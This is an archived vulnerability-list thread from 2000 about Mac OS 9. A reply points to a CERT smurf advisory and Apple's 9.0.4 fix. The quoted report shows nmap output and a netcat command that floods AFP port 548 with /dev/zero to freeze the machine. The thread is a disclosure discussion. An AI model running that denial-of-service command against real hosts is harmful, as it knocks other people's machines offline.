Vulnerability Development mailing list archives

Re: Apple Mac DoS


From: Ian Stoba <ian () BABCOCKBROWN COM>
Date: Thu, 14 Dec 2000 09:13:01 -0800

Mac OS 9.0 is subject to smurf amplification. Here's a link to the CERT advisory:

http://www.cert.org/advisories/CA-98.01.smurf.html

This is fixed in Mac OS 9.0.4. The update is freely available from Apple:

http://asu.info.apple.com/swupdates.nsf/artnum/n11617

Also, I happened to buy a copy of Mac OS 9 off the shelf in a CompUSA store this week
and noticed that the version on the install CD was 9.0.4.

The Q wrote:

  I have noticed some unusual behaviour with Mac OS 9
  I am not a Mac user so I apologize if this is a known bug

  I have checked the archives and generally on the Net and can find no
mention of this effect

  anyway, a bit of background...

  I was nmapping a mac (running os 9) to see if I could diagnose why a smb
connection couldn't be established. Not being familiar with mac os (at all)
I telnetted to the open ports and didn't get a lot.

  erm...

  then decided to try a netcat to each port.... (don't ask why)

  well to cut a long story short it causes a MASSIVE DoS on the mac if you
netcat /dev/zero to port 548 tcp. The Machine needs a reset before it will
respond. Surely this can't be right?

  the details

  - Ports open are

  testhost@testhost ]$ nmap 192.168.1.96     ## IP of a mac boxen

  Starting nmap V. 2.53 by fyodor () insecure org ( www.insecure.org/nmap/ )
  Interesting ports on  (192.168.1.96):
  (The 1521 ports scanned but not shown below are in state: closed)
  Port       State       Service
  427/tcp    open        svrloc
  548/tcp    open        afpovertcp

  Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds

  to cause the DoS

  testhost@testhost ]$./nc -v 192.168.1.96 548 < /dev/zero

  caused massive DoS - mouse nonfunctional (important on a mac :o)

of course when you stop the netcat the mac returns to normal after 10-20
secs
